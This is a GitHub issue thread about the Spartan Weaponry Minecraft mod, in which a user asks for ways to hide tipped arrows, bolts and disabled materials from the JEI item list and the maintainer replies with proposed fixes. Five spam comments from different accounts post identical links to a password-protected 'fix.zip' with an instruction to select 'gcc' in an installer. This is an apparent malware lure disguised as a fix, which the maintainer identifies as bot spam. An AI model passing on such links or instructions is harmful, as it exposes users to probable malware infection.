### ISSUE TITLE
Significant Bloat + Ways to Fix It

### ISSUE THREAD

**Issue by Meylin-Messor** [ObliviousSpartan/SpartanWeaponry-API#78]
To put this simply: The Spartan weaponry Minecraft Mod adds far too much, of what I personally consider to be 'junk' in some ways, most of it, being taken up by all of the arrows the aforementioned minecraft mod adds, without any way to completely Disable And / Or Remove the aforementioned 'junk' from even appearing in JEI, which can cause some problems once the amount of Pages for JEI Gets to be too high

I have checked, and about 13 Entire Pages worth of JEI, is taken up by Arrows and Bolts Alone.  There are around 200 Arrows / Bolts, Per Type.  With Wooden, Copper, and Iron Arrows, along with Copper and Regular Bolts, being essentially Useless comparative to Diamond and Netherite Arrows And Bolts, in most cases except for certain Minecraft modpacks were progress is more heavily restricted, but, If the Memories I have are correct, that is, if the memories I have are correct, not the norm.

So, I am here to suggest some fixes to this.
{1}: Allow people to Disable Tipped Arrows + Bolt(s), and the Non Tipped Arrow(s) + Bolt(s) Individually, so JEI isn't so absolutely bloated by potion arrows people won't ever use, while still allowing a version of an arrow to exist that people MIGHT use.

{2}: When you Disable a Material type from being used, anything associated with it from the Spartan Weaponry Minecraft Mod(s), should be Entirely Removed from JEI as well, Meaing: Disable The Aluminum Material?  No more Aluminum weapons should be clogging up JEI.

How to accomplish this?  I have a few was I believe this could be accomplished in different ways, whichever is easier, would be preferable should it provide essentially the same function, however: The Apotheosis Minecraft Mod can Remove/Prevent items from Appearing in JEI When certain modules for The Apotheosis Minecraft Mod are Disabled, I suggest you all take a page out of that book if possible.

So, with that out of the way, let's begin with what I believe could be solutions to the First Problem:
(1)- An Option in the configuration file for the Main Spartan Weaponry Minecraft Mod to disable the following Separately, which means One option for Each of the following, AND Remove Whatever of the following is Selected to be Disabled FROM The JEI Menu:
Wooden Arrow, Wooden Tipped Arrow(s), Copper Arrow, Copper Tipped Arrow(s), Iron Arrow, Iron Tipped Arrow(s), Diamond Arrow, Diamond Tipped Arrow(s), Netherite Arrow, Netherite Tipped Arrow(s), Bolt, Tipped Bolt, Copper Bolt, Copper Tipped Bolt, Diamond Bolt, Diamond Tipped Bolt, Netherite Bolt, Netherite Tipped Bolt.
Each of the Above Arrow(s) and Bolt(s) being able to be Separately Disabled and if Disabled Not Appearing in JEI.

(2)- Make Each Arrow Type that is added by the Main Spartan Weaponry Minecraft Mod File, A Separate Mod Addon, with One containing Non Tipped Arrows + Bolts, and the other, requiring the first, has the Tipped Arrows + Bolts.
This'd likely be easier, but allows far less customization for the users and will force them to either not use the Crossbows from the Spartan Weaponry Mod, or, still have the item bloat if they want to due to wanting the aforementioned Tipped Arrows + Bolts, which isn't ideal, but likely the easiest solution.

(3)- A more advanced version of {2}, Separating things further, with each non tipped Arrow Type still being grouped into One Mod, but the Tipped Arrow + Bolt types being separated into multiple separate mods for each, one for wooden, one for Iron, one for Diamond, one for Netherite, with Arrows, then the same applies for Bolts.  This'd likely be a headache and a half and likely significantly increase the mod quantity of a minecraft game, which isn't exactly great, try to mix and match this up if required, perhaps group the Bolts and Arrows of each type into one, and call it a day, so then it's down to 4 mods, instead of 7.

I do not know what is the easiest approach as I have zero knowledge of coding and such, but this is what I can suggest and hope it makes a difference in the Spartan Weaponry minecraft mod going forward, but quite honestly, to make my annoyance known, I am surprised and quite honestly disappointed one of the above solutions wasn't Implemented a long while back, since it'd make things so much better and easier, that is, if the above Solutions are even Realistic or Possible, if not, then I hold no ill will nor harbor bad feelings about it(In case you are wondering, I have indeed gone into the config file((s)) for the Spartan Weaponry Minecraft Mod, and disabled some stuff within the aforementioned Config file((s)), if what I said should happen normally would, but did not, then something wrong happened on my end and I do not know what).

Also: If I have offeneded anyone by saying any of this, then I will not be posting here again.

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ObliviousSpartan** [comment]
> > Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."
> 
> I Am not doing that either. Seriously. Christ how many bots are on this place?!

Hi. Sorry for the bot spam and for accidentially deleting one of your comments. That was actually a mistake and I was intending on getting rid of the bot spam.
This is the first time that it has ever happened in this Github repository as well, so I'm quite confused about it.
I'll put a proper comment up about this issue very soon

**Comment by ObliviousSpartan** [comment]
Anyway, onto your issue report. I'll go through your points one by one. What version are you using by the way? Since you mention the Aluminium material, this narrows down the version of Minecraft you're using this on is between 1.18.2-1.20.1.

1) It is true that there is a lot of pages (depending on your UI scale, and potion effects (and mods indirectly) available in your Minecraft instance) dedicated to tipped arrows/bolts. 
I was thinking of a different solution which should save a lot of JEI bloat. I could hide all tipped variants of those arrows/bolts in JEI and have them only viewable when looking up a recipe that uses their standard arrow/bolt variant. This would eliminate ALL of those variants showing up in JEI.
On that note, I should mention that each arrow type only have two separate registered item types in Minecraft e,g, Copper Arrows and Tipped Copper Arrows. Each variant of the tipped arrow/bolt is defined entirely by it's self-contained NBT data (basically data stored on an item stack when created; the same way as vanilla Minecraft did it)

2) As far as disabling materials go in the config for at least the version for Minecraft 1.20.1, hiding all weapons with this material in JEI should already be working the way you are suggesting. It is possible you might be using an older version which I believe had an issue with Aluminium specifically.

**Comment by Meylin-Messor** [comment]
> Anyway, onto your issue report. I'll go through your points one by one. What version are you using by the way? Since you mention the Aluminium material, this narrows down the version of Minecraft you're using this on is between 1.18.2-1.20.1.
> 
> 1. It is true that there is a lot of pages (depending on your UI scale, and potion effects (and mods indirectly) available in your Minecraft instance) dedicated to tipped arrows/bolts.
>    I was thinking of a different solution which should save a lot of JEI bloat. I could hide all tipped variants of those arrows/bolts in JEI and have them only viewable when looking up a recipe that uses their standard arrow/bolt variant. This would eliminate ALL of those variants showing up in JEI.
>    On that note, I should mention that each arrow type only have two separate registered item types in Minecraft e,g, Copper Arrows and Tipped Copper Arrows. Each variant of the tipped arrow/bolt is defined entirely by it's self-contained NBT data (basically data stored on an item stack when created; the same way as vanilla Minecraft did it)
> 2. As far as disabling materials go in the config for at least the version for Minecraft 1.20.1, hiding all weapons with this material in JEI should already be working the way you are suggesting. It is possible you might be using an older version which I believe had an issue with Aluminium specifically.

Regarding '1.':
That is a very good idea!  I don't know if that's actually possible, but if it is: Good choice!  However: you might want to add some kind of information to the description of the Normal Variant(s) of the Arrow(s) and Bolt(s) that tells people about the Tipped Arrow(s) and Bolt(s) still being present, but not showing in JEI Due to bloating JEI Otherwise.  Essentially just 'Check Crafting in JEI To Find Tipped Arrow(s) and Bolt(s)' or some such.

Regarding '2.': 
I am using the Latest Version of The Spartan Weaponry(Forge((Not Neo Forge)) ) Minecraft Mod for The 1.20.1 Version of the Game Minecraft, and disabling ANY material(s) from being used for Weapons and Such from the Spartan Weaponry Minecraft Mod does NOT Make any item(s) Disappear from JEI.

Also: Might I suggest adding a Piercing Arrow And Bolt variant of the Iron, Diamond, and Netherite Arrows and Bolts that have a damage Reduction, but, can pierce multiple entities?  My suggestion is this: Iron Piercing Arrow = 1 Entity for Arrows, 2 for Bolts, then just increase it by one amount of extra entities pierced per tier with Netherite Piercing Bolts having damage in between the Wooden Arrow and the Regular Minecraft Arrow, and the Netherite Piercing Arrows being akin to the Wooden Arrow damage wise, That much weaker, and for a good reason.

Also: I would ask if you could add the '1.' and '2.' fixes and such that was aforementioned above to the 1.20.1 Version of the Game Minecraft of The Spartan Weaponry(Forge) Minecraft Mod?

**Comment by Meylin-Messor** [comment]
So, Spartan?  May I ask: How long will it be, as an ETA(Not an actual deadline, but a 'Assuming everything goes well and nothing screws up Stuff MIGHT Be Done by this point') Before the update for, at the very least, the Tipped Arrows and Bolts being removed from JEI, if at all possible?
